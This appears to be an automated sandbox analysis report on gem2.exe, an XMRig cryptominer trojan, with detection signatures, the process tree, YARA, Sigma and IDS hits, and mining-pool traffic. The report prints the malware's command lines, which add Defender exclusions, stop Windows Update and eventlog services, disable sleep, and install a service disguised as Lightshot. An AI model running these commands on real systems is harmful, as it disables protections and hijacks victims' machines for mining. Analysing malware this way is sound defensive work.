Windows Analysis Report
gem2.exe

Overview

General Information

Sample name: gem2.exe
Analysis ID: 1587388
MD5: 990a3f3b1273510f210fb9b541da219f
SHA1: 33e536c5b4bdb6f6042f93445dffd8a3ad488e8b
SHA256: 35a8d03f86ae6f92424d6424fe0805d338eccedff177b400182102685299022c
Tags: exe, Jalapeno, malware, trojan, user-Joker

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • gem2.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\gem2.exe" MD5: 990A3F3B1273510F210FB9B541DA219F)
    • powershell.exe (PID: 7292 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7656 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7572 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7672 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7720 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7768 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7808 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7848 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7856 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7864 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7872 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7888 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 924 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sc.exe (PID: 7924 cmdline: C:\Windows\system32\sc.exe delete "GeekBrains" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8096 cmdline: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8136 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8144 cmdline: C:\Windows\system32\sc.exe start "GeekBrains" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Lightshot.exe (PID: 6472 cmdline: C:\ProgramData\Screenshots\Lightshot.exe MD5: 990A3F3B1273510F210FB9B541DA219F)
    • powershell.exe (PID: 7092 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1020 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6488 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 4760 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2140 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5628 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7332 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7392 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7296 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7300 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7652 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7572 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7660 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 444 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 732 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1032 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1056 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 7724 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 7720 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |

Source | Rule | Description | Author | Strings
00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
  • 0x37eb98:$a1: mining.set_target
  • 0x370e20:$a2: XMRIG_HOSTNAME
  • 0x373748:$a3: Usage: xmrig [OPTIONS]
  • 0x370df8:$a4: XMRIG_VERSION
Process Memory Space: dialer.exe PID: 7720 | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
Process Memory Space: dialer.exe PID: 7720 | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
  • 0x359f1:$a1: mining.set_target
  • 0x3219a:$a2: XMRIG_HOSTNAME
  • 0x32f12:$a3: Usage: xmrig [OPTIONS]
  • 0x3217b:$a4: XMRIG_VERSION

Source | Rule | Description | Author | Strings
65.2.dialer.exe.140000000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
65.2.dialer.exe.140000000.0.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
  • 0x37ef98:$a1: mining.set_target
  • 0x371220:$a2: XMRIG_HOSTNAME
  • 0x373b48:$a3: Usage: xmrig [OPTIONS]
  • 0x3711f8:$a4: XMRIG_VERSION
65.2.dialer.exe.140000000.0.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth |
  • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
65.2.dialer.exe.140000000.0.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen |
  • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
  • 0x3cd180:$s3: \\.\WinRing0_
  • 0x376148:$s4: pool_wallet
  • 0x3705f0:$s5: cryptonight
  • 0x370600:$s5: cryptonight
  • 0x370610:$s5: cryptonight
  • 0x370620:$s5: cryptonight
  • 0x370638:$s5: cryptonight
  • 0x370648:$s5: cryptonight
  • 0x370658:$s5: cryptonight
  • 0x370670:$s5: cryptonight
  • 0x370680:$s5: cryptonight
  • 0x370698:$s5: cryptonight
  • 0x3706b0:$s5: cryptonight
  • 0x3706c0:$s5: cryptonight
  • 0x3706d0:$s5: cryptonight
  • 0x3706e0:$s5: cryptonight
  • 0x3706f8:$s5: cryptonight
  • 0x370710:$s5: cryptonight
  • 0x370720:$s5: cryptonight
  • 0x370730:$s5: cryptonight

          Change of critical system settings

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 7280, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7848, ProcessName: powercfg.exe

          System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 7280, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7292, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 7888, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 924, ProcessName: svchost.exe
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 7280, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto", ProcessId: 8096, ProcessName: sc.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 7280, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7292, ProcessName: powershell.exe

          HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 7280, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 8136, ProcessName: sc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T10:16:08.375586+0100 | 2047928 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.5 | 60174 | 1.1.1.1 | 53 | UDP
2025-01-10T10:15:53.890023+0100 | 2826930 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.5 | 49704 | 141.94.96.144 | 80 | TCP


          AV Detection

Source: C:\ProgramData\Screenshots\Lightshot.exe; ReversingLabs: Detection: 65%
Source: gem2.exe; Virustotal: Detection: 62%
Source: gem2.exe; ReversingLabs: Detection: 65%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability

          Bitcoin Miner

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: dialer.exe PID: 7720, type: MEMORYSTR
Source: global traffic; TCP traffic: 192.168.2.5:49704 -> 141.94.96.144:80 payload (data ascii):
{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46m39dm1dqjfkunt3t2kihnu6qqjmrf79j31fsbtbnafux9b2gawysjlfadq5mhqr4m6c8jjrfxwlpxdhapucrhe3mrbjtw","pass":"ultima","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
Source: dialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: stratum+tcp://
Source: dialer.exe; String found in binary or memory: cryptonight-monerov7
Source: dialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: -o, --url=URL URL of mining server
Source: dialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: Usage: xmrig [OPTIONS]
Source: gem2.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb; source: Lightshot.exe, 00000025.00000003.2127811419.000002683F580000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\winlogon.exe; Code function: 29_2_000001E85898DCE0 FindFirstFileExW, 29_2_000001E85898DCE0
Source: C:\Windows\System32\lsass.exe; Code function: 36_2_00000140AE86DCE0 FindFirstFileExW, 36_2_00000140AE86DCE0
Source: C:\Windows\System32\svchost.exe; Code function: 40_2_00000195DD5CDCE0 FindFirstFileExW, 40_2_00000195DD5CDCE0
Source: C:\Windows\System32\dwm.exe; Code function: 41_2_000001160CBEDCE0 FindFirstFileExW, 41_2_000001160CBEDCE0
Source: C:\Windows\System32\svchost.exe; Code function: 66_2_00000257E10ADCE0 FindFirstFileExW, 66_2_00000257E10ADCE0
Source: C:\Windows\System32\svchost.exe; Code function: 67_2_000001F28C93DCE0 FindFirstFileExW, 67_2_000001F28C93DCE0
Source: C:\Windows\System32\svchost.exe; Code function: 68_2_000001CA9854DCE0 FindFirstFileExW, 68_2_000001CA9854DCE0
Source: C:\Windows\System32\svchost.exe; Code function: 69_2_000001D26531DCE0 FindFirstFileExW, 69_2_000001D26531DCE0
Source: global traffic; TCP traffic: 192.168.2.5:50294 -> 1.1.1.1:53
Source: global traffic; TCP traffic: 192.168.2.5:56302 -> 162.159.36.2:53
Source: Joe Sandbox View; IP Address: 141.94.96.144
Source: Joe Sandbox View; ASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
Source: Network traffic; Suricata IDS: 2047928 - Severity 2 - ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) : 192.168.2.5:60174 -> 1.1.1.1:53
Source: Network traffic; Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.5:49704 -> 141.94.96.144:80
Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: pool.supportxmr.com
Source: lsass.exe, 00000024.00000002.3311887155.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://3csp.icrosof4m/ocp0
Source: lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000024.00000000.2096932816.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2202391543.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2216849441.00000140AE172000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312230976.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3311544783.00000140AE05D000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: lsass.exe, 00000024.00000002.3311409075.00000140AE000000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097259456.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: Lightshot.exe, 00000025.00000003.2127811419.000002683F580000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: Lightshot.exe, 00000025.00000003.2127811419.000002683F580000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/Root.crl0
